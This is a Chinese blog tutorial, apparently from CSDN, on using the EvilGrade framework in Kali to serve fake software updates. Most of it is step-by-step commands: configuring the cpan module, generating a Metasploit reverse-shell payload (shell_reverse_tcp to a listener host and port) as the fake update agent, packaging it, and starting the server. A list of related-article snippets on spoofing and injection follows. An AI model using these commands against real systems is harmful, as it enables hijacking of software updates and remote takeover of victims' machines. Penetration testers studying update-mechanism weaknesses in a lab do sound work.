使用EvilGrade注入假更新

最新推荐文章于 2022-06-28 04:09:47 发布
最新推荐文章于 2022-06-28 04:09:47 发布
阅读量329 收藏
点赞数
分类专栏: kali 文章标签: 操作系统 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82606684
版权
通常软甲更新过程:
软件开始更新过程,然后尝试从dns服务器获取IP信息(例如update.notepadplus.com)。dns返回响应信息。软件从update.app1.com获取lastupdate.xml文件分析是否有更新。如果有,则安装之。

[img]http://dl2.iteye.com/upload/attachment/0101/8853/98f8dc50-88e5-3ef1-952b-1b0c83eaf4b3.png[/img]

kali中配置的EvilGrade软件可以用于注入假软件更新。
[color=blue]1.root@kali:~# evilgrade[/color]
[DEBUG] - Loading module: modules/allmynotes.pm
[DEBUG] - Loading module: modules/amsn.pm
[DEBUG] - Loading module: modules/appleupdate.pm
...
_ _ _
(_) | | |
_____ ___| | __ _ _ __ __ _ __| | ___
/ _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
| __/\ V /| | | (_| | | | (_| | (_| | __/
\___| \_/ |_|_|\__, |_| \__,_|\__,_|\___|
__/ |
|___/
-------------------------------------------
--------------------- www.infobytesec.com
- 63 modules available.
[color=blue]2.运行help命令可以看到该软件很简单,另外evilgrade支持tab键补全功能。[/color]
[img]http://dl2.iteye.com/upload/attachment/0101/8857/151d8a07-2f9b-36d4-a0ed-1422c83913b9.jpg[/img]
[color=blue]3.配置使用cpan模块:[/color]
[img]http://dl2.iteye.com/upload/attachment/0101/8859/34396306-2bd9-3b6d-b13f-b56d282bb4be.jpg[/img]
注意VirtualHost是一个很重要的参数,它将会用于后门的攻击。
[color=blue]4.接下来设置agent参数,agent只不过是我们伪造的二进制文件。我们将设置它的存储位置,我们也可以设置一个动态的假的二进制更新文件。[/color]
方法一:在EvilGrade内创建: 
evilgrade (notepadplus)>set agent ‘["/pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.59.128 LPORT=5555 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]‘

[b][color=red]<%OUT%><%OUT>[/color][/b]标签用于指明输出二进制文件的位置。
方法二:在EvilGrade 使用msfpayload来生成
root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.59.128 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 68
Options: {"LHOST"=>"192.168.59.128", "LPORT"=>"5555"}

制作agent文件:
tar cf linux2.tar linux2
gzip linux2.tar
设置agent参数并开始运行:
evilgrade(cpan)>set agent /root/agent_perl.tar.gz
set agent, /root/agent_perl.tar.gz
evilgrade(cpan)>start
更多详细资料,参考http://resources.infosecinstitute.com/hacking-autoupdate-evilgrade/
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
普通开发者网络安全必读(阿里云舒著)
小饼仙子的专栏
10-22 1669
原文发表在《程序员》201408,本文为摘抄版。 1.常见误区 黑客、网络安全只存在于虚拟世界: 随着物联网,可穿戴设备,智能家居的发展,汽车开窗户,刹车,远程sex等,使得安全问题彻底渗透到生活的各个方面。 程序布置在内网,会阻挡攻击:著名网络安全研究员superhei做了名为走向内网的邪恶之路的主题演讲,直接在外网盲打入侵内网获取权限,其基本原理是使用JR
分享国外安全团队及工具
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
evilgrade:Evilgrade是一个模块化框架,允许用户通过注入更新来利用不良的升级实现
02-06
法拉第安全研究-| ISR-evilgrade | | - 。:: [简要概述] ::。 Evilgrade是一个模块化框架,允许用户通过注入更新来利用不良的升级实现。 它带有预制的二进制文件(代理),这是快速渗透测试的默认工作配置,并且具有自己的WebServer和DNSServer模块。 易于设置新设置,并且在设置新的二进制代理时具有自动配置。 *我什么时候应该使用evilgrade? 当攻击者能够进行主机名重定向(操纵受害者的dns流量)时,此框架就会起作用,并且可以在以下两种情况下完成此操作: 内部风景: 内部DNS访问 ARP欺骗 DNS缓存中毒 DHCP欺骗 TCP劫持
构建伪Update服务器工具isr-evilgrade
02-28 91
构建伪Update服务器工具isr-evilgrade 现在大部分软件都提供更新功能。软件一旦运行,就自动检查对应的Update服务器。如果发现新版本,就会提示用户,并进行下载和安装。而用户往往相...
【翻译】在backtrack5上用Evilgrade工具15步**windows
weixin_34090562的博客
05-06 168
首先声明下,这是我转转自红盟的一篇文章,原文链接在这里:http://www.cnhonkerarmy.com/thread-78296-1-1.html 这篇文章是我无意中看见的evligrade的一个利用教程,由于是英文的所以翻译给大家看看!感觉对大家的认识和提高都有很多的作用,其实漏洞无处不在!开拓我们的思维,才是关键! 好了,废话不多说! ----...
如何劫持软件更新来安装 Rootkit 的后门访问
dj1174232716的专栏
06-17 1453
有无数种方法破解系统。如果我们想应用自己的系统,我们不应该忽视任何的可能性,我们需要搜索弱点保持警惕。在这次破解,我们将会看看滥用信任用户对软件更新,他们的系统上安装监听器/rootkit。 利用”值得信赖”的软件更新 我们都看见这条消息 — —现在有可用的软件更新!无一例外,我们相信此消息并下载的更新,大概是使我们更好地工作、 添加新功能,或使我们的系统更安全的系统。 如果,相
Wi-fEye-v0.5.zip
06-04
2. Path for evilgrade (line 16) Ex: hamster='/pentest/hamster/' Each module in Wi-fEye uses a specific program to perform the selected attack. Here is a list of the programes needed for each modeule:...
Gray.Hat.Hacking.The.Ethical.Hackers.Handbook.4th.Edition
06-26
Build and launch spoofing exploits with Ettercap and Evilgrade Induce error conditions and crash software using fuzzers Hack Cisco routers, switches, and network hardware Use advanced reverse ...
渗透测试入门19之渗透测试工具2
鹿鸣天涯
04-17 2543
适用于渗透测试不同阶段的工具收集整理 内容 侦察 武器化 交货 命令与控制 横向运动 建立立足点 升级特权 数据泄露 杂项 参考 该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。 侦察 主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识...
欺骗伪装攻击
zhaji001
08-29 3678
Ettercap ARP欺骗,Evilgrade DNS欺骗,Metasploit Responder NetBIOS LLMNR欺骗 ARP欺骗:扮网关,拦截任何要离开本地网络的流量. DNS欺骗:DNS名称到IP转换创建一个不正确的响应.能够欺骗用户从攻击者服务器获取恶意数据和用户访问恶意站点.   Ettercap  ARP欺骗局域网中的windows7: ettercap 支持...
浅谈盲注中的基于时间型和布尔型的注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1557
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
网络安全学习中的工具
gugonggugong的博客
12-06 3057
1> Nmap Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。 系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。 其基本功能有三个,一是探测一组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。 2> P0f p0f是一个纯粹的被动指纹识别工具,它在不干涉双方通信的情...
evillimiter安装与使用
weixin_68281676的博客
06-28 3869
开启上网限制工具:进入kali安装 wget github.com/bitbrute/evillimiter.git #下载 cd evillimiter #进入 sudo python3 setup.py install #安装 安装之后我们直接打开evillimiter 终端输入evillimiter scan 扫描一下 hosts 列出ip limit 2 1kbit 设......
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4898
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
nslookup用ip查域名
iteye_16188的博客
08-29 2674
在一次信息侦查中发现,可以使用nslookup来反向确认域名服务器(不是所有的都好使)。 root@kali:~# nslookup > [color=red]ip_addr[/color] Server: 192.168.59.2 Address: 192.168.59.2#53 Non-authoritative answer: [color=re...
kali破解pdf密码
iteye_16188的博客
08-28 1277
1. apt-get install pdfcrack 2. pdfcrack --help pdfcrack -f filename [OPTIONS]
kali更新exploit-db
iteye_16188的博客
12-12 1249
[code="java"]cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf archive.tar.bz2 rm archive.tar.bz2[/code]
Kali中使用nslookup
iteye_16188的博客
10-23 1156
支持下面的记录类型: - SOA : Start of Authority. Defines the zone name, an e-mail contact and various time and refresh values applicable to the zone. - A : the IPv4 address that belongs to machine name - AAA...
(1)掌握伪造更新服务的工作原理 (2)掌握isr-evilgrade工具的下载和配置 (3)掌握使用isr-evilgrade工具与DNS欺骗联合进行伪造更新服务的方法
最新发布
06-09
好的,以下是关于伪造更新服务的工作原理、isr-evilgrade工具的下载和配置以及使用isr-evilgrade工具与DNS欺骗联合进行伪造更新服务的方法: 1. 伪造更新服务的工作原理 伪造更新服务的基本原理是通过欺骗用户让其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值